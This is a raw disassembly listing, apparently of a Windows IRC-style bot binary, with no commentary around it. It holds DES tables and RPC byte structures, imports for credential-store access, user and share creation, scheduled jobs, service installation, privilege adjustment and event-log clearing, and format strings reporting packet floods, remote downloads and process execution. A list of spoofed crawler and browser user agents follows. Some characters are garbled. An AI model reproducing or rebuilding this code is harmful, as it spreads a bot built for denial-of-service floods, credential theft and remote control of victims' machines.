dd 400000h, 20004000h, 404010h, 400000h, 20000010h, 400010h
dd 20004000h, 20000000h, 4010h, 0
dd 400010h, 20004010h, 4000h, 404000h, 20004010h, 10h
dd 2 dup(20400010h), 0
dd offset loc_40400F+1
dd 20404000h, 4010h, 404000h, 20404000h, 20000000h, 20004000h
dd 10h, 20400010h, 404000h, 20404010h, 400000h, 4010h
dd 20000010h, 400000h, 20004000h, 20000000h, 4010h, 20000010h
dd 20404010h, 404000h, 20400000h, 404010h, 20404000h, 0
dd 20400010h, 10h, 4000h, 20400000h, 404010h, 4000h, 400010h
dd 20004010h, 0
dd 20404000h, 20000000h, 400010h, 20004010h
dword_436340 dd 200000h ; sub_40B1D8+16B�r
dd 4200002h, 4000802h, 0
dd 800h, 4000802h, 200802h, 4200800h, 4200802h, 200000h
dd 0
dd 4000002h, 2, 4000000h, 4200002h, 802h, 4000800h, 200802h
dd 200002h, 4000800h, 4000002h, 4200000h, 4200800h, 200002h
dd 4200000h, 800h, 802h, 4200802h, 200800h, 2, 4000000h
dd 200800h, 4000000h, 200800h, 200000h, 2 dup(4000802h)
dd 2 dup(4200002h), 2, 200002h, 4000000h, 4000800h, 200000h
dd 4200800h, 802h, 200802h, 4200800h, 802h, 4000002h, 4200802h
dd 4200000h, 200800h, 0
dd 2, 4200802h, 0
dd 200802h, 4200000h, 800h, 4000002h, 4000800h, 800h, 200002h
dword_436440 dd 10001040h ; sub_40B1D8+1AC�r
dd 1000h, 40000h, 10041040h, 10000000h, 10001040h, 40h
dd 10000000h, 40040h, 10040000h, 10041040h, 41000h, 10041000h
dd 41040h, 1000h, 40h, 10040000h, 10000040h, 10001000h
dd 1040h, 41000h, 40040h, 10040040h, 10041000h, 1040h
dd 2 dup(0)
dd 10040040h, 10000040h, 10001000h, 41040h, 40000h, 41040h
dd 40000h, 10041000h, 1000h, 40h, 10040040h, 1000h, 41040h
dd 10001000h, 40h, 10000040h, 10040000h, 10040040h, 10000000h
dd 40000h, 10001040h, 0
dd 10041040h, 40040h, 10000040h, 10040000h, 10001000h
dd 10001040h, 0
dd 10041040h, 2 dup(41000h), 2 dup(1040h), 40040h, 10000000h
dd 10041000h
dword_436540 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_436590 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40B427+E8�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4368F4 dd 20h, 0 dd 20h, 5C005Ch, 0
off_436908 dd offset dword_43005C ; DATA XREF: sub_40B427+122�o
dd offset dword_5C0024
a12345611111111:
unicode 0, <123456111111111111111.doc>,0
align 8
dword_436948 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 3 dup(0)
aRrrrrrrrrrrrrr db ''
db ''
db '',0
off_436A28 dd offset word_580046 ; DATA XREF: sub_40B427+31�o
; sub_40B427+72�o
dd offset loc_42004D+1
dd offset word_580046
dd offset word_580046
dd offset loc_42004D+1
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd offset word_580046
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
dword_436A5C dd 158h dword_436A60 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_436AAC dd 3000005h, 10h, 5 dup(0)dword_436AC8 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_436B10 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
; ---------------------------------------------------------------------------
loc_436B44: ; DATA XREF: .text:0040B908�o
mov eax, [esp-4]
add eax, 0FFFFFAE0h
jmp eax
; ---------------------------------------------------------------------------
align 10h
loc_436B50: ; DATA XREF: .text:0040B8B3�o
mov eax, [ebp+30h]
add eax, 0FFFFFB24h
jmp eax
; ---------------------------------------------------------------------------
align 4
loc_436B5C: ; DATA XREF: .text:0040B957�o
jmp short loc_436B6E
; ---------------------------------------------------------------------------
jmp short loc_436B79
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_436B64: ; DATA XREF: .text:0040B9B2�o
jmp short near ptr word_436B6A
; ---------------------------------------------------------------------------
dw 0FFFFh
db 2 dup(0FFh)
word_436B6A dw 0 ; CODE XREF: .text:loc_436B64�j
; ---------------------------------------------------------------------------
loc_436B6C: ; DATA XREF: .text:0040B9D3�o
jmp short near ptr word_436B72
; ---------------------------------------------------------------------------
loc_436B6E: ; CODE XREF: .text:loc_436B5C�j
; .text:loc_436B8C�j
jmp short loc_436B74
; ---------------------------------------------------------------------------
db 2 dup(0)
word_436B72 dw 0 ; CODE XREF: .text:loc_436B6C�j
; ---------------------------------------------------------------------------
loc_436B74: ; CODE XREF: .text:loc_436B6E�j
; DATA XREF: .text:0040B9F7�o
jmp short near ptr loc_436B79+1
; ---------------------------------------------------------------------------
dw 0FFFFh
db 0FFh
; ---------------------------------------------------------------------------
loc_436B79: ; CODE XREF: .text:00436B5E�j
; .text:loc_436B74�j
inc dword ptr [eax]
; ---------------------------------------------------------------------------
db 0
off_436B7C dd offset loc_41005C ; DATA XREF: .text:0040BA46�o
dd 2 dup(0)
dword_436B88 dd 77F33723h ; ---------------------------------------------------------------------------
loc_436B8C: ; DATA XREF: .text:0040B990�o
jmp short loc_436B6E
; ---------------------------------------------------------------------------
dw 7FFDh
dword_436B90 dd 18759Fh dword_436B94 dd 1001C59h dword_436B98 dd 1B0B0Bh dword_436B9C dd 6EBh dword_436BA0 dd 0F4EBh aPathremovefile db 'PathRemoveFileSpecA',0 ; DATA XREF: sub_40BB43+CDA�o
aShlwapi_dll db 'shlwapi.dll',0 ; DATA XREF: sub_40BB43:loc_40C811�o
aGetuserprofile db 'GetUserProfileDirectoryA',0 ; DATA XREF: sub_40BB43+CAA�o
align 10h
aUserenv_dll db 'userenv.dll',0 ; DATA XREF: sub_40BB43:loc_40C7E2�o
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: sub_40BB43+C7B�o
align 4
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: sub_40BB43:loc_40C7B3�o
aGetprocessmemo db 'GetProcessMemoryInfo',0 ; DATA XREF: sub_40BB43+C1F�o
align 4
aEnumprocesses db 'EnumProcesses',0 ; DATA XREF: sub_40BB43+C12�o
align 4
aEnumprocessmod db 'EnumProcessModules',0 ; DATA XREF: sub_40BB43+C05�o
align 4
aGetmodulebasen db 'GetModuleBaseNameA',0 ; DATA XREF: sub_40BB43+BF8�o
align 10h
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_40BB43+BF0�o
align 4
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_40BB43:loc_40C726�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_40BB43+BAE�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_40BB43+BA6�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_40BB43:loc_40C6DC�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_40BB43+B54�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_40BB43+B47�o
align 10h
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_40BB43+B3A�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_40BB43+B32�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_40BB43:loc_40C668�o
aGetnetworkpara db 'GetNetworkParams',0 ; DATA XREF: sub_40BB43:loc_40C640�o
align 4
aGetudptable db 'GetUdpTable',0 ; DATA XREF: sub_40BB43+ABD�o
aGettcptable db 'GetTcpTable',0 ; DATA XREF: sub_40BB43+AB0�o
aGetiftable db 'GetIfTable',0 ; DATA XREF: sub_40BB43+AA3�o
align 4
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_40BB43+A96�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_40BB43+A8E�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_40BB43:loc_40C5C0�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_40BB43+A48�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_40BB43+A40�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_40BB43:loc_40C576�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_40BB43+9B6�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_40BB43+9A9�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_40BB43+99C�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_40BB43+98F�o
align 10h
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_40BB43+982�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_40BB43+975�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_40BB43+968�o
align 10h
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_40BB43+95B�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_40BB43+94E�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_40BB43+941�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_40BB43+939�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_40BB43:loc_40C46B�o
align 4
aMozilla5_0Comp db 'Mozilla/5.0 (compatible)',0 ; DATA XREF: sub_40BB43+8FB�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_40BB43+889�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_40BB43+87C�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_40BB43+86F�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_40BB43+862�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_40BB43+855�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_40BB43+848�o
align 4
aFtpputfilea db 'FtpPutFileA',0 ; DATA XREF: sub_40BB43+83B�o
aFtpgetfilea db 'FtpGetFileA',0 ; DATA XREF: sub_40BB43+82E�o
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_40BB43+821�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_40BB43+814�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_40BB43+807�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_40BB43+7FF�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_40BB43:loc_40C331�o
aShutdown db 'shutdown',0 ; DATA XREF: sub_40BB43+6B1�o
align 4
aClosesocket db 'closesocket',0 ; DATA XREF: sub_40BB43+6A4�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_40BB43+697�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_40BB43+68A�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_40BB43+67D�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_40BB43+670�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_40BB43+663�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_40BB43+656�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_40BB43+649�o
align 10h
aListen db 'listen',0 ; DATA XREF: sub_40BB43+63C�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_40BB43+62F�o
align 10h
aBind db 'bind',0 ; DATA XREF: sub_40BB43+627�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_40BB43+615�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_40BB43+608�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_40BB43+5FB�o
align 4
aSend db 'send',0 ; DATA XREF: sub_40BB43+5EE�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_40BB43+5E1�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_40BB43+5D4�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_40BB43+5C7�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_40BB43+5BA�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_40BB43+5AD�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_40BB43+5A0�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_40BB43+593�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_40BB43+586�o
aSocket db 'socket',0 ; DATA XREF: sub_40BB43+579�o
align 10h
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_40BB43+56C�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_40BB43+55F�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_40BB43+552�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_40BB43+545�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_40BB43+538�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_40BB43+52B�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_40BB43+523�o
align 10h
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_40BB43:loc_40C055�o
align 4
aCloseeventlog db 'CloseEventLog',0 ; DATA XREF: sub_40BB43+4D5�o
align 4
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_40BB43+4C8�o
align 4
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_40BB43:loc_40C003�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_40BB43:loc_40BFE8�o
align 4
aSetservicestat db 'SetServiceStatus',0 ; DATA XREF: sub_40BB43+415�o
align 10h
aRegisterservic db 'RegisterServiceCtrlHandlerA',0 ; DATA XREF: sub_40BB43+408�o
aUnlockserviced db 'UnlockServiceDatabase',0 ; DATA XREF: sub_40BB43+3FB�o
align 4
aChangeservicec db 'ChangeServiceConfig2A',0 ; DATA XREF: sub_40BB43+3EE�o
align 4
aQueryservicelo db 'QueryServiceLockStatusA',0 ; DATA XREF: sub_40BB43+3E1�o
aLockservicedat db 'LockServiceDatabase',0 ; DATA XREF: sub_40BB43+3D4�o
aImpersonatelog db 'ImpersonateLoggedOnUser',0 ; DATA XREF: sub_40BB43+3C7�o
aStartservicect db 'StartServiceCtrlDispatcherA',0 ; DATA XREF: sub_40BB43+3BA�o
aCreateservicea db 'CreateServiceA',0 ; DATA XREF: sub_40BB43+3AD�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_40BB43+3A0�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_40BB43+393�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_40BB43+386�o
align 10h
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_40BB43+379�o
align 10h
aControlservice db 'ControlService',0 ; DATA XREF: sub_40BB43+36C�o
align 10h
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_40BB43+35F�o
align 10h
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_40BB43+352�o
align 10h
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_40BB43:loc_40BE8D�o
align 10h
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_40BB43+312�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_40BB43+305�o
align 10h
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_40BB43+2F8�o
align 4
aOpenthreadtoke db 'OpenThreadToken',0 ; DATA XREF: sub_40BB43:loc_40BE33�o
aRegqueryinfoke db 'RegQueryInfoKeyA',0 ; DATA XREF: sub_40BB43+290�o
align 4
aRegenumvaluea db 'RegEnumValueA',0 ; DATA XREF: sub_40BB43+283�o
align 4
aRegenumkeyexa db 'RegEnumKeyExA',0 ; DATA XREF: sub_40BB43+276�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_40BB43+269�o
aRegdeletekeya db 'RegDeleteKeyA',0 ; DATA XREF: sub_40BB43+25C�o
align 4
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_40BB43+24F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_40BB43+242�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_40BB43+235�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_40BB43+228�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_40BB43+220�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_40BB43:loc_40BD52�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_40BB43+1A2�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_40BB43+195�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_40BB43+188�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_40BB43+17B�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_40BB43+16E�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_40BB43+161�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_40BB43+154�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_40BB43+147�o
align 4
aClosewindow db 'CloseWindow',0 ; DATA XREF: sub_40BB43+13F�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40BB43+12E�o
; sub_42D64E+D�o
align 4
aGetcomputernam db 'GetComputerNameA',0 ; DATA XREF: sub_40BB43+AA�o
align 10h
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_40BB43+9D�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_40BB43+90�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_40BB43+83�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_40BB43+76�o
align 10h
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_40BB43+69�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_40BB43+5C�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_40BB43+4F�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_40BB43+42�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_40BB43+35�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_40BB43+28�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_40BB43+20�o
align 4
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_40BB43+3�o
align 4
aRa_0 db 'ra',0 ; DATA XREF: sub_40C847+423�o
align 4
aWon db 'won',0 ; DATA XREF: sub_40C847+376�o
aRst db 'rst',0 ; DATA XREF: sub_40C847+353�o
aWak db 'wak',0 ; DATA XREF: sub_40C847+330�o
aWy db 'wy',0 ; DATA XREF: sub_40C847+30D�o
align 10h
aSDoneWithSFloo db '%s Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%'
; DATA XREF: sub_40C847+1AF�o
db 'dMB).',0
align 4
aSBadUrlOrDnsEr db '%s Bad URL or DNS Error, error: <%d>',0 ; DATA XREF: sub_40CDE2+6A8�o
align 10h
aSUpdateFailedE db '%s Update failed: Error executing file: %s.',0
; DATA XREF: sub_40CDE2+65B�o
aSProcessFinish db '%s Process Finished: "%s", Total Running Time: %s.',0
; DATA XREF: sub_40CDE2+57B�o
align 10h
a_2d_2d db ' %.2d:%.2d',0 ; DATA XREF: sub_40CDE2+544�o
; sub_417CD7+2B4�o
align 4
aDS db ' %d%s',0 ; DATA XREF: sub_40CDE2+51B�o
; sub_417CD7+289�o
align 4
aHours db ' hours',0 ; DATA XREF: sub_40CDE2+50E�o
; sub_417CD7+27C�o
align 4
aHour db ' hour',0 ; DATA XREF: sub_40CDE2+507�o
; sub_417CD7+275�o
align 4
aSCreatedProces db '%s Created process: "%s", PID: <%d>',0 ; DATA XREF: sub_40CDE2+457�o
aSFailedToCreat db '%s Failed to create process: "%s", error: <%d>',0
; DATA XREF: sub_40CDE2+3E7�o
align 4
aSCouldnTParseP db '%s Couldn',27h,'t parse path, error: <%d>',0
; DATA XREF: sub_40CDE2+328�o
aSFileDownload_ db '%s File download: %.1fKB to: %s @ %.1fKB/sec.',0
; DATA XREF: sub_40CDE2+25D�o
; sub_40CDE2+2C1�o
align 4
aSCouldnTOpenFi db '%s Couldn',27h,'t open file for writing: %s.',0
; DATA XREF: sub_40CDE2+B2�o
align 8
off_437718 dd offset aFastWebcrawler ; DATA XREF: .text:0040E060�r
; .text:0040E069�r ...
; "FAST-WebCrawler/3.8 (atw-crawler at fas"...
dd offset aGooglebot2_0Ht ; "Googlebot/2.0 (+http://www.googlebot.co"...
dd offset aLynx2_8_4rel_1 ; "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1"...
dd offset aGooglebot2_1Ht ; "Googlebot/2.1 (+http://www.googlebot.co"...
dd offset aMicrosoftWebda ; "Microsoft-WebDAV-MiniRedir/5.1.2600"
dd offset aGooglebot2_0_0 ; "Googlebot/2.0 (http://www.google.com/bo"...
dd offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot2_1_0 ; "Googlebot/2.1 (http://www.google.com/bo"...
dd offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot1_9Ht ; "Googlebot/1.9 (http://www.google.com/to"...
dd offset aMozilla4_0Co_1 ; "Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
dd offset aGooglebot1_9_1 ; "Googlebot/1.9.1 (http://www.google.com/"...
dd offset aMozilla4_0Co_2 ; "Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
dd offset aMozilla4_0Co_3 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_4 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_5 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_6 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_7 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_8 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_9 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_10 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_0 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_1 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_2 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_3 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_4 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_5 ; "Mozilla/5.0 compatible ZyBorg/1.0 (wn.z"...
dd offset aMozilla4_75En ; "Mozilla/4.75 [en]"
dd offset aMozilla5_0Slur ; "Mozilla/5.0 (Slurp/cat; slurp@inktomi.c"...
dd offset aMozilla5_0Sl_0 ; "Mozilla/5.0 (Slurp/si; slurp@inktomi.co"...
dd offset aMozilla5_0Wind ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_0 ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_1 ; "Mozilla/5.0 (Windows; U; Windows NT 5.2"...
dd offset aMozilla5_0X11U ; "Mozilla/5.0 (X11; U; FreeBSD i386; en-U"...
dd offset aScooter3_2 ; "Scooter/3.2"
dd offset aWget1_8 ; "Wget/1.8"
dd offset aMozilla5_0X1_0 ; "Mozilla/5.0 (X11; U; openSuSe i686; SMP"...
dd offset aWget2_0 ; "Wget/2.0"
dd offset aMozilla5_0X1_1 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset aWget21 ; "Wget/2,1"
dd offset aMozilla5_0X1_2 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset dword_4377C4
dd 0
dword_4377C4 dd 73797870h, 392E312Fh, 342EhaMozilla5_0X1_2 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7.5) Gecko/20080112'
; DATA XREF: .text:004377B8�o
db 0
align 4
aWget21 db 'Wget/2,1',0 ; DATA XREF: .text:004377B4�o
align 10h
aMozilla5_0X1_1 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7) Gecko/20060502',0
; DATA XREF: .text:004377B0�o
aWget2_0 db 'Wget/2.0',0 ; DATA XREF: .text:004377AC�o
align 10h
aMozilla5_0X1_0 db 'Mozilla/5.0 (X11; U; openSuSe i686; SMP; en-US; rv:1.7) Gecko/200'
; DATA XREF: .text:004377A8�o
db '51223',0
align 4
aWget1_8 db 'Wget/1.8',0 ; DATA XREF: .text:004377A4�o
align 4
aScooter3_2 db 'Scooter/3.2',0 ; DATA XREF: .text:004377A0�o
aMozilla5_0X11U db 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021',0
; DATA XREF: .text:0043779C�o
; .text:0043D998�o
align 8
aMozilla5_0Wi_1 db 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:00437798�o
db '030728 Mozilla Firebird/0.7',0
align 4
aMozilla5_0Wi_0 db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:00437794�o
db '020718',0
aMozilla5_0Wind db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/200'
; DATA XREF: .text:00437790�o
db '31007',0
align 4
aMozilla5_0Sl_0 db 'Mozilla/5.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/'
; DATA XREF: .text:0043778C�o
db 'slurp.html)',0
align 4
aMozilla5_0Slur db 'Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com'
; DATA XREF: .text:00437788�o
db '/slurp.html)',0
align 4
